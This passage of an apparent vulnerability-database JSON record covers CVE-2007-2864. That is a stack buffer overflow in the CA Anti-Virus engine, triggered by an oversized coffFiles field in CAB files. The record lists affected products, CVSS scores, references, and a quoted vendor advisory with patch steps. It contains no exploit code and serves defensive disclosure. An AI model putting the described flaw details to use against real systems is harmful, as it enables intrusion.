"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "9.01"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates brightstor arcserve backup",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "10.5"
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:10.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:2.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:2.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:6.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_antivirus:7.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:internet_security_suite:2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:1.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:common_services:1.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:integrated_threat_management:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:brightstor_arcserve_backup:9.01:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_antivirus:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:3.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:etrust_ez_armor:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:unicenter_network_and_systems_management:11.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Anonymous",
"sources": [
{
"db": "ZDI",
"id": "ZDI-07-035"
}
],
"trust": 0.7
},
"cve": "CVE-2007-2864",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2007-2864",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-26226",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2007-2864",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#105105",
"trust": 0.8,
"value": "15.19"
},
{
"author": "CNNVD",
"id": "CNNVD-200706-098",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-26226",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in the Anti-Virus engine before content update 30.6 in multiple CA (formerly Computer Associates) products allows remote attackers to execute arbitrary code via a large invalid value of the coffFiles field in a .CAB file. There are several affected products. Large values result in an unbounded data copy operation which can result in an exploitable stack-based buffer overflow. Computer Associates is the world\u0027s leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA has issued an update to \naddress the vulnerabilities. The first vulnerability, \nCVE-2007-2863, is due to insufficient bounds checking on filenames \ncontained in a CAB archive. The second vulnerability, \nCVE-2007-2863, is due to insufficient bounds checking on the \n\"coffFiles\" field. By using a specially malformed CAB file, an \nattacker can cause a crash or take unauthorized action on an \naffected system. \n\nMitigating Factors: None\n\nSeverity: CA has given these vulnerabilities a High risk rating. \n\nAffected Products:\nCA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8, \n r8.1\nCA Anti-Virus 2007 (v8)\neTrust EZ Antivirus r7, r6.1\nCA Internet Security Suite 2007 (v3)\neTrust Internet Security Suite r1, r2\neTrust EZ Armor r1, r2, r3.x\nCA Threat Manager for the Enterprise (formerly eTrust Integrated \n Threat Management) r8\nCA Protection Suites r2, r3\nCA Secure Content Manager (formerly eTrust Secure Content \n Manager) 8.0\nCA Anti-Virus Gateway (formerly eTrust Antivirus eTrust Antivirus \n Gateway) 7.1\nUnicenter Network and Systems Management (NSM) r3.0\nUnicenter Network and Systems Management (NSM) r3.1\nUnicenter Network and Systems Management (NSM) r11\nUnicenter Network and Systems Management (NSM) r11.1\nBrightStor ARCserve Backup r11.5\nBrightStor ARCserve Backup r11.1\nBrightStor ARCserve Backup r11 for Windows\nBrightStor Enterprise Backup r10.5\nBrightStor ARCserve Backup v9.01\nCA Common Services\nCA Anti-Virus SDK (formerly eTrust Anti-Virus SDK)\n\nAffected Platforms:\nAll\n\nStatus and Recommendation:\nCA has issued content update 30.6 to address the vulnerabilities. \nThe updated engine is provided with content updates. Ensure the \nlatest content update is installed if the signature version is \nless than version 30.6. \n\nFor BrightStor ARCserve Backup:\n\n1. To update the signatures one time only, open a command window, \nchange into the \"C:\\Program Files\\CA\\SharedComponents\\ScanEngine\" \ndirectory, and enter the following command:\n\ninodist /cfg inodist.ini\n\n2. To update on a regular schedule:\n\n* Submit a GenericJob using the ARCserve Job Scheduler. Please \nsearch the BrightStor Administrator\u0027s Guide for \u0027Antivirus \nMaintenance\u0027 and follow the directions. \n\nOr\n\n* Use the above command line instruction with the AT Scheduler. \n\n\nWorkaround: None\n\nReferences (URLs may wrap):\nCA SupportConnect:\nhttp://supportconnect.ca.com/\nCA SupportConnect Security Notice for this vulnerability:\nSecurity Notice for CA products implementing the Anti-Virus engine\nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securit\nynotice.asp\nCA Security Advisor posting: CA Anti-Virus Engine CAB File Buffer \nOverflow Vulnerabilities\nhttp://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680\nCAID: 35395, 35396\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395\nhttp://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396\nReported By: ZDI\nZDI Advisory: ZDI-07-034, ZDI-07-035\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-034.html\nhttp://www.zerodayinitiative.com/advisories/ZDI-07-035.html\nCVE References: CVE-2007-2863, CVE-2007-2864\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2863\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2864\nOSVDB References: OSVDB-35244, OSVDB-35245\nhttp://osvdb.org/35244\nhttp://osvdb.org/35245\n\nChangelog for this advisory:\nv1.0 - Initial Release\n\nCustomers who require additional information should contact CA\nTechnical Support at http://supportconnect.ca.com. \n\nFor technical questions or comments related to this advisory, \nplease send email to vuln AT ca DOT com. \n\nIf you discover a vulnerability in CA products, please report your\nfindings to vuln AT ca DOT com, or utilize our \"Submit a \nVulnerability\" form. \nURL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx\n\n\nRegards,\nKen Williams ; 0xE2941985\nDirector, CA Vulnerability Research\n\nCA, 1 CA Plaza, Islandia, NY 11749\n\t\nContact http://www.ca.com/us/contact/\nLegal Notice http://www.ca.com/us/legal/\nPrivacy Policy http://www.ca.com/us/privacy/\nCopyright (c) 2007 CA. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.5.3 (Build 5003)\n\nwj8DBQFGaCc7eSWR3+KUGYURAnegAKCFM9tJ6RgdwIAc9JRfOcx807pEHwCdHofV\ns2hnGDiljhAMZquR9D1uya8=\n=PQi4\n-----END PGP SIGNATURE-----\n. \nMore details can be found at:\n \nhttp://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp\n\n-- Disclosure Timeline:\n2007.02.16 - Vulnerability reported to vendor\n2007.06.05 - Coordinated public release of advisory\n\n-- Credit:\nThis vulnerability was discovered by an anonymous researcher. \n\n-- About the Zero Day Initiative (ZDI):\nEstablished by TippingPoint, a division of 3Com, The Zero Day Initiative\n(ZDI) represents a best-of-breed model for rewarding security\nresearchers for responsibly disclosing discovered vulnerabilities. \n\nResearchers interested in getting paid for their security research\nthrough the ZDI can find more information and sign-up at:\n\n http://www.zerodayinitiative.com\n\nThe ZDI is unique in how the acquired vulnerability information is used. \n3Com does not re-sell the vulnerability details or any exploit code. \nInstead, upon notifying the affected product vendor, 3Com provides its\ncustomers with zero day protection through its intrusion prevention\ntechnology. Explicit details regarding the specifics of the\nvulnerability are not exposed to any parties until an official vendor\npatch is publicly available. Furthermore, with the altruistic aim of\nhelping to secure a broader user base, 3Com provides this vulnerability\ninformation confidentially to security vendors (including competitors)\nwho have a vulnerability protection or mitigation product. \n\n\nCONFIDENTIALITY NOTICE: This e-mail message, including any attachments,\nis being sent by 3Com for the sole use of the intended recipient(s) and\nmay contain confidential, proprietary and/or privileged information. \nAny unauthorized review, use, disclosure and/or distribution by any \nrecipient is prohibited. If you are not the intended recipient, please\ndelete and/or destroy all copies of this message regardless of form and\nany included attachments and notify 3Com immediately by contacting the\nsender via reply e-mail or forwarding to 3Com at postmaster@3com.com",
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
}
],
"trust": 4.23
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-26226",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-26226"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "SECUNIA",
"id": "25570",
"trust": 4.1
},
{
"db": "NVD",
"id": "CVE-2007-2864",
"trust": 3.7
},
{
"db": "CERT/CC",
"id": "VU#105105",
"trust": 3.6
},
{
"db": "ZDI",
"id": "ZDI-07-035",
"trust": 3.4
},
{
"db": "BID",
"id": "24330",
"trust": 2.8
},
{
"db": "OSVDB",
"id": "35245",
"trust": 2.6
},
{
"db": "SECTRACK",
"id": "1018199",
"trust": 2.5
},
{
"db": "VUPEN",
"id": "ADV-2007-2072",
"trust": 2.5
},
{
"db": "ZDI",
"id": "ZDI-07-034",
"trust": 1.2
},
{
"db": "CERT/CC",
"id": "VU#739409",
"trust": 0.8
},
{
"db": "XF",
"id": "34737",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-154",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "57067",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "83164",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "16677",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-71185",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-26226",
"trust": 0.1
},
{
"db": "OSVDB",
"id": "35244",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57100",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"id": "VAR-200706-0018",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-26226"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:45:08.082000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Anti-Virus\u30a8\u30f3\u30b8\u30f3\u3092\u5b9f\u88c5\u3057\u3066\u3044\u308bCA\u88fd\u54c1\u306b\u304a\u3051\u308b\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306b\u95a2\u3059\u308b\u304a\u77e5\u3089\u305b",
"trust": 0.8,
"url": "http://www.casupport.jp/resources/anti_virus_engine_security.htm"
},
{
"title": "sk33132",
"trust": 0.8,
"url": "https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=\u0026solutionid=sk33132"
},
{
"title": "35396",
"trust": 0.8,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396"
},
{
"title": "Computer Associates has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp"
},
{
"title": "CA CAB File header parsing remote stack overflow vulnerability repair measures",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=146809"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2007-2864"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 4.4,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securitynotice.asp"
},
{
"trust": 2.8,
"url": "http://www.kb.cert.org/vuls/id/105105"
},
{
"trust": 2.7,
"url": "http://www.zerodayinitiative.com/advisories/zdi-07-035.html"
},
{
"trust": 2.5,
"url": "http://www.securityfocus.com/bid/24330"
},
{
"trust": 2.5,
"url": "http://www.osvdb.org/35245"
},
{
"trust": 2.5,
"url": "http://www.securitytracker.com/id?1018199"
},
{
"trust": 2.5,
"url": "http://secunia.com/advisories/25570"
},
{
"trust": 2.5,
"url": "http://www.vupen.com/english/advisories/2007/2072"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/470602/100/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/470754/100/0/threaded"
},
{
"trust": 1.7,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34737"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/25570/"
},
{
"trust": 1.2,
"url": "http://www.zerodayinitiative.com/advisories/zdi-07-034.html"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2864"
},
{
"trust": 0.8,
"url": "http://xforce.iss.net/xforce/xfdb/34737"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2007-2864"
},
{
"trust": 0.3,
"url": "http://www.ca.com"
},
{
"trust": 0.3,
"url": "/archive/1/470754"
},
{
"trust": 0.3,
"url": "/archive/1/470602"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2864"
},
{
"trust": 0.1,
"url": "http://osvdb.org/35245"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com."
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-2863"
},
{
"trust": 0.1,
"url": "http://osvdb.org/35244"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=144680"
},
{
"trust": 0.1,
"url": "http://supportconnect.ca.com/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35396"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=35395"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2007-2863"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "http://supportconnectw.ca.com/public/antivirus/infodocs/caantivirus-securit"
},
{
"trust": 0.1,
"url": "http://www.zerodayinitiative.com"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#739409"
},
{
"db": "CERT/CC",
"id": "VU#105105"
},
{
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"db": "VULHUB",
"id": "VHN-26226"
},
{
"db": "BID",
"id": "24330"
},
{
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#739409"
},
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#105105"
},
{
"date": "2007-06-05T00:00:00",
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"date": "2007-06-06T00:00:00",
"db": "VULHUB",
"id": "VHN-26226"
},
{
"date": "2007-06-05T00:00:00",
"db": "BID",
"id": "24330"
},
{
"date": "2009-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"date": "2007-06-10T23:43:37",
"db": "PACKETSTORM",
"id": "57100"
},
{
"date": "2007-06-07T06:15:45",
"db": "PACKETSTORM",
"id": "57067"
},
{
"date": "2007-06-06T21:30:00",
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"date": "2007-06-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#739409"
},
{
"date": "2007-06-06T00:00:00",
"db": "CERT/CC",
"id": "VU#105105"
},
{
"date": "2007-06-05T00:00:00",
"db": "ZDI",
"id": "ZDI-07-035"
},
{
"date": "2018-10-16T00:00:00",
"db": "VULHUB",
"id": "VHN-26226"
},
{
"date": "2009-09-28T20:10:00",
"db": "BID",
"id": "24330"
},
{
"date": "2009-03-27T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2007-001196"
},
{
"date": "2021-04-14T15:34:35.667000",
"db": "NVD",
"id": "CVE-2007-2864"
},
{
"date": "2021-04-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "57100"
},
{
"db": "PACKETSTORM",
"id": "57067"
},
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Computer Associates Anti-Virus engine fails to properly handle long file names in CAB archives",
"sources": [
{
"db": "CERT/CC",
"id": "VU#739409"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200706-098"
}
],
"trust": 0.6
}
}
VAR-201102-0367
